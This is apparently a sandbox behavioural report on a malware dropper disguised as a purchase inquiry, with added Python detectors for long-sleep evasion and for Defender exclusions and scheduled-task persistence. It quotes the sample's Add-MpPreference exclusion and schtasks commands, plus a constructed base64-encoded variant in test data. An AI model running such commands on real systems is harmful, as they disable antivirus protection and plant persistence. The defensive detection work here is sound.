            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Purchase Inquiry_002.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exe | Process information set: NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            Source: Yara match | File source: Process Memory Space: Purchase Inquiry_002.exe PID: 7180, type: MEMORYSTR
            Source: Yara match | File source: Process Memory Space: xASiLfzXONGIW.exe PID: 1412, type: MEMORYSTR
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exe | Code function: 14_2_0040E18D Sleep,ExitProcess
            Source: C:\Users\user\Desktop\Purchase Inquiry_002.exe | Memory allocated: 27A0000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\Purchase Inquiry_002.exe | Memory allocated: 2830000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\Purchase Inquiry_002.exe | Memory allocated: 4830000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\Purchase Inquiry_002.exe | Memory allocated: 8B80000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\Purchase Inquiry_002.exe | Memory allocated: 9B80000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\Purchase Inquiry_002.exe | Memory allocated: 9D90000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\Purchase Inquiry_002.exe | Memory allocated: AD90000 memory reserve | memory write watch
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exe | Memory allocated: 13E0000 memory reserve | memory write watch
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exe | Memory allocated: 2E30000 memory reserve | memory write watch
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exe | Memory allocated: 1460000 memory reserve | memory write watch
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exe | Memory allocated: 8AD0000 memory reserve | memory write watch
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exe | Memory allocated: 9AD0000 memory reserve | memory write watch
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exe | Memory allocated: 9CC0000 memory reserve | memory write watch
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exe | Memory allocated: ACC0000 memory reserve | memory write watch
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exe | Code function: 14_2_004186FE OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle
            Source: C:\Users\user\Desktop\Purchase Inquiry_002.exe | Thread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exe | Thread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 6373
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 7235
            Source: C:\Users\user\Desktop\Purchase Inquiry_002.exe | Window / User API: threadDelayed 398
            Source: C:\Users\user\Desktop\Purchase Inquiry_002.exe | Window / User API: threadDelayed 9104
            Source: C:\Users\user\Desktop\Purchase Inquiry_002.exe | Window / User API: foregroundWindowGot 1771
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exe | API coverage: 5.0 %
            Source: C:\Users\user\Desktop\Purchase Inquiry_002.exe TID: 7248 | Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7644 | Thread sleep count: 6373 > 30
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 920 | Thread sleep time: -5534023222112862s >= -30000s
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1672 | Thread sleep count: 173 > 30
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5948 | Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8008 | Thread sleep time: -8301034833169293s >= -30000s
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1516 | Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Users\user\Desktop\Purchase Inquiry_002.exe TID: 7612 | Thread sleep count: 222 > 30
            Source: C:\Users\user\Desktop\Purchase Inquiry_002.exe TID: 7612 | Thread sleep time: -111000s >= -30000s
            Source: C:\Users\user\Desktop\Purchase Inquiry_002.exe TID: 3276 | Thread sleep count: 398 > 30
            Source: C:\Users\user\Desktop\Purchase Inquiry_002.exe TID: 3276 | Thread sleep time: -1194000s >= -30000s
            Source: C:\Users\user\Desktop\Purchase Inquiry_002.exe TID: 3276 | Thread sleep count: 9104 > 30
            Source: C:\Users\user\Desktop\Purchase Inquiry_002.exe TID: 3276 | Thread sleep time: -27312000s >= -30000s
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exe TID: 8060 | Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Last function: Thread delayed
            Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exe | Code function: 14_2_0041A01B FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exe | Code function: 14_2_0040B28E FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exe | Code function: 14_2_0040838E __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exe | Code function: 14_2_004087A0 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exe | Code function: 14_2_00407848 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exe | Code function: 14_2_004068CD FindFirstFileW,FindNextFileW
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exe | Code function: 14_2_0044BA59 FindFirstFileExA
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exe | Code function: 14_2_0040AA71 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exe | Code function: 14_2_00417AAB FindFirstFileW,FindNextFileW,FindNextFileW
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exe | Code function: 14_2_0040AC78 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exe | Code function: 14_2_00406D28 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW
            Source: Purchase Inquiry_002.exe, 00000009.00000002.3752310900.0000000001537000.00000004.00000020.00020000.00000000.sdmp, Purchase Inquiry_002.exe, 00000009.00000002.3752688490.00000000015A7000.00000004.00000020.00020000.00000000.sdmp, Purchase Inquiry_002.exe, 00000009.00000002.3752688490.00000000015B0000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
            Source: C:\Users\user\Desktop\Purchase Inquiry_002.exe | Process information queried: ProcessInformation
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exe | Code function: 14_2_004327AE IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exe | Code function: 14_2_0041A8DA LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exe | Code function: 14_2_004407B5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exe | Code function: 14_2_00410763 SetLastError,GetNativeSystemInfo,SetLastError,GetProcessHeap,HeapAlloc,SetLastError
            Source: C:\Users\user\Desktop\Purchase Inquiry_002.exe | Process token adjusted: Debug
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exe | Code function: 14_2_004328FC SetUnhandledExceptionFilter
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exe | Code function: 14_2_004398AC IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exe | Code function: 14_2_00432D5C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
            Source: C:\Users\user\Desktop\Purchase Inquiry_002.exe | Memory allocated: page read and write | page guard
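The per-thread sleep telemetry in this section is the sandbox's long-sleep heuristic: a thread is reported once it exceeds 30 sleep calls or 30 s of cumulative delay, and the delay value 922337203685477 (Int64.MaxValue in 100 ns ticks, expressed in milliseconds) is a wait that is never meant to return. The Python below is an added example, not code from Joe Sandbox or from the sample, that applies the same thresholds to a hooked Sleep/NtDelayExecution trace. The trace is constructed to mirror the report's numbers (222 calls totalling 111000 ms on TID 7612, 9104 calls of 3000 ms on TID 3276, one maximal wait on TID 7248, plus a benign control thread); the event field names, the API list and the rule that a delay of Int64.MaxValue / 10000 ms counts as infinite rather than being summed are assumptions of this example.

```python
"""Added example: re-apply the report's long-sleep heuristics to an API trace."""
from collections import defaultdict

# Largest delay representable in 100 ns units, expressed in milliseconds
# (Int64.MaxValue // 10000). A wait this long never returns, so the example
# flags it as an infinite sleep instead of adding it to the running total.
INFINITE_DELAY_MS = (2**63 - 1) // 10_000        # 922337203685477
SLEEP_COUNT_THRESHOLD = 30                        # report rule: sleep count > 30
SLEEP_TOTAL_THRESHOLD_MS = 30_000                 # report rule: cumulative sleep >= 30 s
SLEEP_APIS = {"Sleep", "SleepEx", "NtDelayExecution"}   # assumed hook set


def make_event(pid, tid, api, delay_ms):
    """One hooked-API record; the field names are this example's own schema."""
    return {"pid": pid, "tid": tid, "api": api, "delay_ms": delay_ms}


# Constructed trace modelled on the report's per-TID figures; not a real capture.
SAMPLE_TRACE = (
    [make_event(7180, 7248, "NtDelayExecution", INFINITE_DELAY_MS)]
    + [make_event(7180, 7612, "Sleep", 500) for _ in range(222)]
    + [make_event(7180, 3276, "Sleep", 3000) for _ in range(9104)]
    + [make_event(7180, 4444, "Sleep", 100) for _ in range(5)]      # benign control thread
    + [make_event(7180, 4444, "CreateFileW", 0)]                    # non-sleep API, ignored
)


def summarize_sleeps(trace):
    """Aggregate sleep calls per (pid, tid): call count, finite total, infinite flag."""
    per_thread = defaultdict(lambda: {"count": 0, "total_ms": 0, "infinite": False})
    for ev in trace:
        if ev["api"] not in SLEEP_APIS:
            continue
        entry = per_thread[(ev["pid"], ev["tid"])]
        entry["count"] += 1
        if ev["delay_ms"] >= INFINITE_DELAY_MS:
            entry["infinite"] = True
        else:
            entry["total_ms"] += ev["delay_ms"]
    return dict(per_thread)


def flag_evasive_threads(trace):
    """Return every thread that trips at least one of the long-sleep rules."""
    findings = []
    for (pid, tid), s in summarize_sleeps(trace).items():
        reasons = []
        if s["infinite"]:
            reasons.append("infinite wait")
        if s["count"] > SLEEP_COUNT_THRESHOLD:
            reasons.append(f"sleep count {s['count']} > {SLEEP_COUNT_THRESHOLD}")
        if s["total_ms"] >= SLEEP_TOTAL_THRESHOLD_MS:
            reasons.append(f"cumulative sleep {s['total_ms']} ms >= {SLEEP_TOTAL_THRESHOLD_MS} ms")
        if reasons:
            findings.append({"pid": pid, "tid": tid, "reasons": reasons})
    return sorted(findings, key=lambda f: f["tid"])


if __name__ == "__main__":
    for f in flag_evasive_threads(SAMPLE_TRACE):
        print(f"PID {f['pid']} TID {f['tid']}: " + "; ".join(f["reasons"]))
```

Keeping the infinite wait out of the cumulative total is deliberate: a single maximal delay on a thread that otherwise does nothing (TID 7248 here) is a different signal from a tight loop of short sleeps, and a triage rule that summed both would report every parked worker thread with the same score as the evasive loop.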

            HIPS / PFW / Operating System Protection Evasion

            Source: C:\Users\user\Desktop\Purchase Inquiry_002.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Purchase Inquiry_002.exe"
            Source: C:\Users\user\Desktop\Purchase Inquiry_002.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exe"
            Source: C:\Users\user\Desktop\Purchase Inquiry_002.exe | Memory written: C:\Users\user\Desktop\Purchase Inquiry_002.exe base: 400000 value starts with: 4D5A
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exe | Memory written: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exe base: 400000 value starts with: 4D5A
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exe | Code function: 14_2_00410B5C GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exe | Code function: 14_2_004175E1 mouse_event
            Source: C:\Users\user\Desktop\Purchase Inquiry_002.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\xASiLfzXONGIW" /XML "C:\Users\user\AppData\Local\Temp\tmp3EA3.tmp"
            Source: C:\Users\user\Desktop\Purchase Inquiry_002.exe | Process created: C:\Users\user\Desktop\Purchase Inquiry_002.exe "C:\Users\user\Desktop\Purchase Inquiry_002.exe"
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\xASiLfzXONGIW" /XML "C:\Users\user\AppData\Local\Temp\tmp4FBA.tmp"
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exe | Process created: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exe "C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exe"
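The two Add-MpPreference launches and the schtasks /Create /XML import from the user's Temp directory above are the defence-evasion and persistence steps behind the report's "Adds a directory exclusion to Windows Defender", "Scheduled temp file as task from temp location" and "Powershell Base64 Encoded MpPreference Cmdlet" signatures. Note that the created-process path (SysWOW64) and the command line (System32) disagree because the 32-bit parent is subject to file-system redirection; a hunt keyed only on the image path would miss the System32 spelling in the command line. The Python below is an added example, not code from Joe Sandbox or from the sample, that applies equivalent rules to process-creation command lines (the shape of Sysmon event 1 or Security event 4688) and also looks inside a base64 -EncodedCommand payload, which is how the same cmdlet is hidden from plain string matching. The three report commands are taken from the lines above; the encoded variant, the benign control line, the rule names and the severity scheme are constructed for this example.

```python
"""Added example: flag Defender-exclusion and schtasks-from-Temp command lines."""
import base64
import re

# Locations a standard user can write to; an exclusion there shields the dropper itself.
USER_WRITABLE = re.compile(r"(?i)\\(Users|ProgramData|Temp)\\")
TEMP_DIR = re.compile(r"(?i)\\Temp\\|%TEMP%|%TMP%")
MPPREF = re.compile(r"(?i)\b(?:Add|Set)-MpPreference\b")
EXCLUSION = re.compile(r"""(?i)-Exclusion(Path|Process|Extension)\s+(?:"([^"]*)"|'([^']*)'|(\S+))""")
ENCODED = re.compile(r"(?i)\s-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})")
SCHTASKS = re.compile(r'(?i)schtasks(?:\.exe)?"?\s')
CREATE = re.compile(r"(?i)(?:^|\s)/Create\b")
TASK_XML = re.compile(r"""(?i)/XML\s+(?:"([^"]*)"|(\S+))""")


def decode_encoded_command(cmd):
    """Return the script behind -EncodedCommand (base64 of UTF-16LE), or None."""
    m = ENCODED.search(cmd)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze_command_line(cmd):
    """Apply both rules to one process-creation command line; returns a list of findings."""
    findings = []
    decoded = decode_encoded_command(cmd)
    text = cmd if decoded is None else f"{cmd} {decoded}"   # match against the decoded payload too
    if MPPREF.search(text):
        for m in EXCLUSION.finditer(text):
            kind, value = m.group(1), m.group(2) or m.group(3) or m.group(4)
            findings.append({
                "rule": "defender_exclusion",
                "severity": "high" if USER_WRITABLE.search(value) else "medium",
                "detail": f"Exclusion{kind} {value}",
                "encoded": decoded is not None,
            })
    if SCHTASKS.search(text) and CREATE.search(text):
        m = TASK_XML.search(text)
        if m:
            xml = m.group(1) or m.group(2)
            from_temp = TEMP_DIR.search(xml) is not None
            findings.append({
                "rule": "schtasks_xml_from_temp" if from_temp else "schtasks_xml_import",
                "severity": "high" if from_temp else "low",
                "detail": f"task definition imported from {xml}",
                "encoded": False,
            })
    return findings


# Lines 0-2 are the commands from the report; line 3 is a constructed base64-wrapped
# form of the same cmdlet; line 4 is a benign control that must not fire.
HIDDEN_SCRIPT = r'Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exe"'
ENCODED_SAMPLE = "powershell.exe -nop -w hidden -enc " + base64.b64encode(
    HIDDEN_SCRIPT.encode("utf-16-le")).decode()
SAMPLE_COMMAND_LINES = [
    r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Purchase Inquiry_002.exe"',
    r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exe"',
    r'"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\xASiLfzXONGIW" /XML "C:\Users\user\AppData\Local\Temp\tmp3EA3.tmp"',
    ENCODED_SAMPLE,
    r'"C:\Windows\System32\schtasks.exe" /Query /TN "Updates\xASiLfzXONGIW"',
]


def scan(command_lines):
    """Return (line index, finding) pairs for a batch of command lines."""
    return [(i, f) for i, cmd in enumerate(command_lines) for f in analyze_command_line(cmd)]


if __name__ == "__main__":
    for i, f in scan(SAMPLE_COMMAND_LINES):
        tag = " (from -EncodedCommand)" if f["encoded"] else ""
        print(f"[{f['severity']}] line {i}: {f['rule']}: {f['detail']}{tag}")
```

Exclusions added with Add-MpPreference are also visible after the fact in the registry under HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions and via Get-MpPreference, so a response playbook should pair this command-line rule with a periodic diff of the configured exclusion paths; the command-line rule catches the moment of change, the diff catches the cases where the command line was never logged.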
            Source: Purchase Inquiry_002.exe, 00000009.00000002.3752456132.0000000001578000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program Managerh
            Source: Purchase Inquiry_002.exe, 00000009.00000002.3752456132.0000000001578000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program Manager
            Source: Purchase Inquiry_002.exe, 00000009.00000002.3752310900.0000000001537000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program Managerckets
            Source: Purchase Inquiry_002.exe, 00000009.00000002.3752310900.0000000001537000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program ManagerDX\53
            Source: Purchase Inquiry_002.exe, 00000009.00000002.3752310900.0000000001537000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program ManagerDX\
            Source: Purchase Inquiry_002.exe, 00000009.00000002.3752431492.0000000001564000.00000004.00000020.00020000.00000000.sdmp, Purchase Inquiry_002.exe, 00000009.00000002.3752456132.0000000001578000.00000004.00000020.00020000.00000000.sdmp, Purchase Inquiry_002.exe, 00000009.00000002.3752688490.000000000159C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: |Program Manager|
            Source: Purchase Inquiry_002.exe, 00000009.00000002.3752310900.0000000001537000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program ManagerDX\5
            Source: Purchase Inquiry_002.exe, 00000009.00000002.3752456132.0000000001596000.00000004.00000020.00020000.00000000.sdmp, Purchase Inquiry_002.exe, 00000009.00000002.3752310900.0000000001537000.00000004.00000020.00020000.00000000.sdmp, Purchase Inquiry_002.exe, 00000009.00000002.3752688490.00000000015A7000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: [Program Manager]
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exe | Code function: 14_2_004329DA cpuid
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exe | Code function: 14_2_0044F17B EnumSystemLocalesW
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exe | Code function: 14_2_0044F130 EnumSystemLocalesW
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exe | Code function: 14_2_0044F216 EnumSystemLocalesW
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exe | Code function: 14_2_0044F2A3 GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exe | Code function: 14_2_0040E2BB GetLocaleInfoA
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exe | Code function: 14_2_0044F4F3 GetLocaleInfoW
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exe | Code function: 14_2_0044F61C GetLocaleInfoW,GetLocaleInfoW,GetACP
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exe | Code function: 14_2_0044F723 GetLocaleInfoW
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exe | Code function: 14_2_0044F7F0 GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exe | Code function: 14_2_00445914 EnumSystemLocalesW
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exe | Code function: 14_2_00445E1C GetLocaleInfoW
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exe | Code function: 14_2_0044EEB8 IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW
            Source: C:\Users\user\Desktop\Purchase Inquiry_002.exe | Queries volume information: C:\Users\user\Desktop\Purchase Inquiry_002.exe VolumeInformation
            Source: C:\Users\user\Desktop\Purchase Inquiry_002.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
            Source: C:\Users\user\Desktop\Purchase Inquiry_002.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Purchase Inquiry_002.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Purchase Inquiry_002.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Purchase Inquiry_002.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Purchase Inquiry_002.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Purchase Inquiry_002.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Purchase Inquiry_002.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Purchase Inquiry_002.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
